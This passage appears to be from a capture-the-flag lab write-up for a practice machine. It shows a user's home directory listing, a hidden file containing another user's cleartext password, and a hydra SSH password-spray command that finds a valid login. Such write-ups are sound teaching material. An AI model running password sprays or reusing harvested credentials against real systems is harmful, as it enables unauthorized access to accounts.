matthewa
Checking the home directory of the matthewa user after making the lateral movement
matthewa@onlyrands:~$ ll
total 52
drwxrwx---+ 4 matthewa freelancers 4096 Apr 8 11:30 ./
drwxrwxr-x+ 7 root root 4096 Jun 7 2024 ../
-r--------+ 1 matthewa freelancers 120 Jun 7 2024 .~
-rw-rwxr--+ 1 matthewa freelancers 220 Jun 7 2024 .bash_logout*
-rw-rwxr--+ 1 matthewa freelancers 3790 Jun 7 2024 .bashrc*
drwx------+ 2 matthewa freelancers 4096 Apr 8 11:30 .cache/
-rw-rw----+ 1 matthewa freelancers 119 Jun 7 2024 .gitconfig
-rw-rwxr--+ 1 matthewa freelancers 807 Jun 7 2024 .profile*
drwxrwx---+ 3 matthewa freelancers 4096 Jun 7 2024 work/There is an interesting file, .~, in the home directory of the matthewa user
.~
matthewa@onlyrands:~$ cat .~
Dach's password is "RefriedScabbedWasting502". I saw it once when he had to use my terminal to check TeamCity's status.The .~ file contains a CLEARTEXT credential of Dach
Dach user cannot be identified but the password spray attack can be conducted
Password Spray
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ hydra -t 64 -L ./users.txt -p RefriedScabbedWasting502 ssh://onlyrands.com
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-08 13:34:27
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries (l:16/p:1), ~1 try per task
[DATA] attacking ssh://onlyrands.com:22/
[22][ssh] host: onlyrands.com login: briand password: RefriedScabbedWasting502
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-08 13:34:31Dach was the briand user
Validating the credential against the target SSH server